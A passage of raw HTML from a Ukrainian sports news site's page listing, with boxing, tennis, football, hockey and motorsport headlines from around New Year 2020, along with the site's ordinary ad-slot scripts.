href="https://euro.com.ua/box/2020/01/01/girn-nazval-daty-i-mesto-boia-ysik-chisora/" title="Гірн назвал дату и место боя Усик &#8211; Чисора" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/8b5958feec3e6647f1dce75bccf08865-364x225.jpg" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fgirn-nazval-daty-i-mesto-boia-ysik-chisora%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%93%D1%96%D1%80%D0%BD+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BB+%D0%B4%D0%B0%D1%82%D1%83+%D0%B8+%D0%BC%D0%B5%D1%81%D1%82%D0%BE+%D0%B1%D0%BE%D1%8F+%D0%A3%D1%81%D0%B8%D0%BA+%E2%80%93+%D0%A7%D0%B8%D1%81%D0%BE%D1%80%D0%B0&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fgirn-nazval-daty-i-mesto-boia-ysik-chisora%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fgirn-nazval-daty-i-mesto-boia-ysik-chisora%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/01/girn-nazval-daty-i-mesto-boia-ysik-chisora/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/01/girn-nazval-daty-i-mesto-boia-ysik-chisora/" rel="bookmark" title="Гірн назвал дату и место боя Усик &#8211; Чисора">Гірн назвал дату и место боя Усик &#8211; Чисора</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-01T09:36:00+00:00">01.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/01/girn-nazval-daty-i-mesto-boia-ysik-chisora/" title="Гірн назвал дату и место боя Усик &#8211; Чисора"><i class="icon-simple icon-fire"></i>77</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/01/girn-nazval-daty-i-mesto-boia-ysik-chisora/" rel="bookmark" title="Гірн назвал дату и место боя Усик &#8211; Чисора">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2019/12/31/ysik-hochy-mira-v-kajdyi-dom-v-kajdoe-serdce/" title="Усик: Хочу мира в каждый дом, в каждое сердце" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2019/12/41bc42cf8921e820a97270abd264aa19-364x225.png" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2019%2F12%2F31%2Fysik-hochy-mira-v-kajdyi-dom-v-kajdoe-serdce%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%A3%D1%81%D0%B8%D0%BA%3A+%D0%A5%D0%BE%D1%87%D1%83+%D0%BC%D0%B8%D1%80%D0%B0+%D0%B2+%D0%BA%D0%B0%D0%B6%D0%B4%D1%8B%D0%B9+%D0%B4%D0%BE%D0%BC%2C+%D0%B2+%D0%BA%D0%B0%D0%B6%D0%B4%D0%BE%D0%B5+%D1%81%D0%B5%D1%80%D0%B4%D1%86%D0%B5&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2019%2F12%2F31%2Fysik-hochy-mira-v-kajdyi-dom-v-kajdoe-serdce%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2019%2F12%2F31%2Fysik-hochy-mira-v-kajdyi-dom-v-kajdoe-serdce%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2019/12/31/ysik-hochy-mira-v-kajdyi-dom-v-kajdoe-serdce/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2019/12/31/ysik-hochy-mira-v-kajdyi-dom-v-kajdoe-serdce/" rel="bookmark" title="Усик: Хочу мира в каждый дом, в каждое сердце">Усик: Хочу мира в каждый дом, в каждое сердце</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-31T20:51:00+00:00">31.12.2019</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2019/12/31/ysik-hochy-mira-v-kajdyi-dom-v-kajdoe-serdce/" title="Усик: Хочу мира в каждый дом, в каждое сердце"><i class="icon-simple icon-fire"></i>4</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2019/12/31/ysik-hochy-mira-v-kajdyi-dom-v-kajdoe-serdce/" rel="bookmark" title="Усик: Хочу мира в каждый дом, в каждое сердце">Читать больше</a></div></div><!--post body--></article></div></div></div></div></div><aside class="sidebar-wrap col-sm-4 col-xs-12 clearfix" ><div class="ruby-sidebar-sticky"><div class="sidebar-inner"><section id="custom_html-4" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Story адаптивный -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-3009791374728080"
     data-ad-slot="7693195683"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

<div id='go2net_ff9985103bc847cfb41b647f58152521_zone_26046_sect_4026_site_3590'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('go2net_ff9985103bc847cfb41b647f58152521_zone_26046_sect_4026_site_3590');
});
</script>

<div id='go2net_4eabb787e5b44f48b6233dc2490508ae_zone_23769_sect_4026_site_3590'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('go2net_4eabb787e5b44f48b6233dc2490508ae_zone_23769_sect_4026_site_3590');
});
</script>

<div id='go2net_f25f6eaaea17495fa6404bd9bf898ed3_zone_13320_sect_4026_site_3590'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('go2net_f25f6eaaea17495fa6404bd9bf898ed3_zone_13320_sect_4026_site_3590');
});
</script>

<div id='go2net_15f91d8fca4842d292a40b622fb7d123_zone_14615_sect_4026_site_3590'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('go2net_15f91d8fca4842d292a40b622fb7d123_zone_14615_sect_4026_site_3590');
});
</script>


<div id='admixer_38d417c0f2d341dd800406b8aceb2df0_zone_33420_sect_10441_site_7501'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('admixer_38d417c0f2d341dd800406b8aceb2df0_zone_33420_sect_10441_site_7501');
});
</script>

<div id='admixer_e162c87c0f354c2e86e043accf0e86e2_zone_33315_sect_10441_site_7501'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('admixer_e162c87c0f354c2e86e043accf0e86e2_zone_33315_sect_10441_site_7501');
});
</script>

<div id='admixer_d69cb801da0f48f29c8343c3c023a357_zone_33317_sect_10441_site_7501'></div>
<script type='text/javascript'>
    admixerML.fn.push(function() {
admixerML.display('admixer_d69cb801da0f48f29c8343c3c023a357_zone_33317_sect_10441_site_7501');
});
</script></div></section><section id="newsmax_ruby_sb_widget_post-5" class="widget sb-widget-post"><div class="block-title widget-title"><h3>Последние новости</h3></div><div class="widget-post-block-outer is-style-16"><div id="block_newsmax_ruby_sb_widget_post-5" class="ruby-block-wrap block-widget-post is-ajax-pagination is-dark-block is-fullwidth" data-block_id= block_newsmax_ruby_sb_widget_post-5 data-block_name= newsmax_ruby_block_widget_post data-posts_per_page= 10 data-block_page_max= 2464 data-block_page_current= 1 data-category_id= all data-orderby= date_post data-block_style= 16 ><div class="ruby-block-inner"><div class="block-content-wrap"><div class="block-content-inner clearfix row"><div class="post-outer"><article class="post-wrap post-overlay post-overlay-1"><div class="post-thumb-outer"><div class="post-mask-overlay"></div><div class="post-thumb is-image ruby-animated-image ruby-fade"><a href="https://euro.com.ua/tennis/2020/01/02/ykraincy-na-tyrnirah-tennis-europe-2-ianvaria-obnovliaetsia/" title="Украинцы на турнирах Tennis Europe 2 января (ОБНОВЛЯЕТСЯ)" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="233" src="https://euro.com.ua/wp-content/uploads/2020/01/5264a79c0e3a69952e4c3ead5718d769-364x233.png" srcset="https://euro.com.ua/wp-content/uploads/2020/01/5264a79c0e3a69952e4c3ead5718d769-364x233.png 768w, https://euro.com.ua/wp-content/uploads/2020/01/5264a79c0e3a69952e4c3ead5718d769-364x225.png 767w" sizes="(max-width: 767px) 33vw, 768px" alt=""/></span></a></div></div><div class="is-header-overlay is-absolute is-light-text"><div class="post-header-outer"><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Ftennis%2F2020%2F01%2F02%2Fykraincy-na-tyrnirah-tennis-europe-2-ianvaria-obnovliaetsia%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%86%D1%8B+%D0%BD%D0%B0+%D1%82%D1%83%D1%80%D0%BD%D0%B8%D1%80%D0%B0%D1%85+Tennis+Europe+2+%D1%8F%D0%BD%D0%B2%D0%B0%D1%80%D1%8F+%28%D0%9E%D0%91%D0%9D%D0%9E%D0%92%D0%9B%D0%AF%D0%95%D0%A2%D0%A1%D0%AF%29&amp;url=https%3A%2F%2Feuro.com.ua%2Ftennis%2F2020%2F01%2F02%2Fykraincy-na-tyrnirah-tennis-europe-2-ianvaria-obnovliaetsia%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Ftennis%2F2020%2F01%2F02%2Fykraincy-na-tyrnirah-tennis-europe-2-ianvaria-obnovliaetsia%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/tennis/2020/01/02/ykraincy-na-tyrnirah-tennis-europe-2-ianvaria-obnovliaetsia/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div><div class="post-header"><div class="post-cat-info"><a class="cat-info-el cat-info-id-4" href="https://euro.com.ua/tennis/" title="Теннис">Теннис</a></div><h2 class="post-title entry-title is-size-2"><a class="post-title-link" href="https://euro.com.ua/tennis/2020/01/02/ykraincy-na-tyrnirah-tennis-europe-2-ianvaria-obnovliaetsia/" rel="bookmark" title="Украинцы на турнирах Tennis Europe 2 января (ОБНОВЛЯЕТСЯ)">Украинцы на турнирах Tennis Europe 2 января (ОБНОВЛЯЕТСЯ)</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T08:49:59+00:00">02.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"></div></div></div><!--post header--></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/" title="Усик: Нашел нормального тренера, когда стал чемпионом мира" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200-100x65.png" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/" rel="bookmark" title="Усик: Нашел нормального тренера, когда стал чемпионом мира">Усик: Нашел нормального тренера, когда стал чемпионом мира</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T08:33:03+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2020/01/02/agent-ob-interese-k-talanta-shahtera/" title="Агент &#8211; об интересе к таланта &#8220;Шахтера&#8221;" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/613f63de3fdf0f7c74632f9e598b6d26.jpeg-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2020/01/02/agent-ob-interese-k-talanta-shahtera/" rel="bookmark" title="Агент &#8211; об интересе к таланта &#8220;Шахтера&#8221;">Агент &#8211; об интересе к таланта &#8220;Шахтера&#8221;</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T07:59:01+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/autosport/2020/01/02/31-dekabria-den-rojdeniia-germana-tilke/" title="31 декабря – день рождения Германа Тильке" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/36d25318f67f7e84f0aa09ec602849e6-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/autosport/2020/01/02/31-dekabria-den-rojdeniia-germana-tilke/" rel="bookmark" title="31 декабря – день рождения Германа Тильке">31 декабря – день рождения Германа Тильке</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T07:25:19+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/hockey/2020/01/02/arizona-sent-lyis-3-1-konec-serii-bluz/" title="&#8220;Аризона&#8221; &#8211; &#8220;Сент-Луис&#8221; (3:1): конец серии &#8220;Блюз&#8221;" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/ed2731b76b68b1b2d9915b14fc703b73-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/hockey/2020/01/02/arizona-sent-lyis-3-1-konec-serii-bluz/" rel="bookmark" title="&#8220;Аризона&#8221; &#8211; &#8220;Сент-Луис&#8221; (3:1): конец серии &#8220;Блюз&#8221;">&#8220;Аризона&#8221; &#8211; &#8220;Сент-Луис&#8221; (3:1): конец серии &#8220;Блюз&#8221;</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T06:50:59+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" title="Арум: Джошуа завершит карьеру в 2020 году" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/052662256283808ff3bcc70bc1c51f1a-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" rel="bookmark" title="Арум: Джошуа завершит карьеру в 2020 году">Арум: Джошуа завершит карьеру в 2020 году</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T06:00:01+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2020/01/02/tete-polnostu-adaptirovalsia-v-ykraine/" title="Тете: Полностью адаптировался в Украине" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/b0591bd8a575fc859a322386fbc2c32b.jpeg-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" srcset="https://euro.com.ua/wp-content/uploads/2020/01/b0591bd8a575fc859a322386fbc2c32b.jpeg-100x65.jpg 100w, https://euro.com.ua/wp-content/uploads/2020/01/b0591bd8a575fc859a322386fbc2c32b.jpeg-548x359.jpg 548w" sizes="(max-width: 100px) 100vw, 100px" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2020/01/02/tete-polnostu-adaptirovalsia-v-ykraine/" rel="bookmark" title="Тете: Полностью адаптировался в Украине">Тете: Полностью адаптировался в Украине</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T05:26:07+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/autosport/2020/01/02/ferstappen-lider-golosovaniia-gonshik-dnia/" title="Ферстаппен – лидер голосования «Гонщик дня»" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/6cbb515cc3708fc11000eb7f538b76c4-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/autosport/2020/01/02/ferstappen-lider-golosovaniia-gonshik-dnia/" rel="bookmark" title="Ферстаппен – лидер голосования «Гонщик дня»">Ферстаппен – лидер голосования «Гонщик дня»</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T04:51:59+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/hockey/2020/01/02/vegas-anahaim-5-2-fleri-oboshel-djozefa/" title="&#8220;Вегас&#8221; &#8211; &#8220;Анахайм&#8221; (5:2): Флери обошел Джозефа" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/ce08bfd135e165505650d58d9dc16555-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/hockey/2020/01/02/vegas-anahaim-5-2-fleri-oboshel-djozefa/" rel="bookmark" title="&#8220;Вегас&#8221; &#8211; &#8220;Анахайм&#8221; (5:2): Флери обошел Джозефа">&#8220;Вегас&#8221; &#8211; &#8220;Анахайм&#8221; (5:2): Флери обошел Джозефа</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T04:17:59+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" title="Ломаченко: Дэвис и Мейвезер в боксе ради денег" rel="bookmark"><span class="thumbnail-resize"><img width="100" height="65" src="https://euro.com.ua/wp-content/uploads/2020/01/938770574725f927c2c8f11c6893f168-100x65.jpg" class="attachment-newsmax_ruby_crop_100x65 size-newsmax_ruby_crop_100x65 wp-post-image" alt="" /></span></a></div></div><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" rel="bookmark" title="Ломаченко: Дэвис и Мейвезер в боксе ради денег">Ломаченко: Дэвис и Мейвезер в боксе ради денег</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T03:27:00+00:00">02.01.2020</time></span><!--meta info date--></div></div></div></article></div><!--post outer--></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev is-disable" data-ajax_pagination_link ="prev"><i class="icon-simple icon-arrow-left"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="icon-simple icon-arrow-right"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></section></div></div></aside></div><div class="box-recommended ruby-block-wrap clearfix fw-block-grid-3 box-recommended-2"><div class="ruby-block-inner ruby-container"><div class="box-recommended-header block-header-wrap"><div class="block-header-inner"><div class="block-title"><h3>Рекомендуем посмотреть</h3></div></div></div><div class="block-content-wrap"><div class="block-content-inner"><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2019/12/25/debyutant-sbornoj-ukrainy-vstretit-novyj-god-v-dnr/" title="Дебютант сборной Украины встретит Новый год в ДНР" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/11/Dmitrij-Ivanisenya-1-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2019/11/Dmitrij-Ivanisenya-1-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2019/11/Dmitrij-Ivanisenya-1-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" alt="Дмитрий Иванисеня"/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-1" href="https://euro.com.ua/football/" title="Футбол">Футбол</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/football/2019/12/25/debyutant-sbornoj-ukrainy-vstretit-novyj-god-v-dnr/" rel="bookmark" title="Дебютант сборной Украины встретит Новый год в ДНР">Дебютант сборной Украины встретит Новый год в ДНР</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-12-25T13:09:22+00:00">25.12.2019</time><time class="updated" datetime="2019-12-25T13:09:23+02:00">25.12.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/tennis/2019/08/13/iastremskaia-vstretitsia-s-eks-pervoi-raketkoi-mira/" title="Ястремская встретится с экс-первой ракеткой мира" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/08/b1f3d0cc204e58dba748b59c82eebb35-272x170.png" srcset="https://euro.com.ua/wp-content/uploads/2019/08/b1f3d0cc204e58dba748b59c82eebb35-272x170.png 768w, https://euro.com.ua/wp-content/uploads/2019/08/b1f3d0cc204e58dba748b59c82eebb35-100x65.png 767w" sizes="(max-width: 767px) 33vw, 768px" alt=""/></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-4" href="https://euro.com.ua/tennis/" title="Теннис">Теннис</a></div></div></div><!--post header--><div class="post-body"><h2 class="post-title entry-title is-size-4"><a class="post-title-link" href="https://euro.com.ua/tennis/2019/08/13/iastremskaia-vstretitsia-s-eks-pervoi-raketkoi-mira/" rel="bookmark" title="Ястремская встретится с экс-первой ракеткой мира">Ястремская встретится с экс-первой ракеткой мира</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2019-08-13T01:17:07+00:00">13.08.2019</time></span><!--meta info date--></div></div></div><!--post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid post-grid-3"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/football/2019/12/30/neimar-razdrajen-iz-za-skandala-v-ykraine/" title="Неймар раздражен из-за скандала в Украине" rel="bookmark"><span class="thumbnail-resize"><img width="272" height="170" src="https://euro.com.ua/wp-content/uploads/2019/12/8ae37e37387b03de1c9277f2836bb3b6-272x170.jpg" srcset="https://euro.com.ua/wp-content/uploads/2019/12/8ae37e37387b03de1c9277f2836bb3b6-272x170.jpg 768w, https://euro.com.ua/wp-content/uploads/2019/12/8ae37e37387b03de1c9277f2836bb3b6-100x65.jpg 767w" sizes="(max-width: 767px) 33vw, 768px" 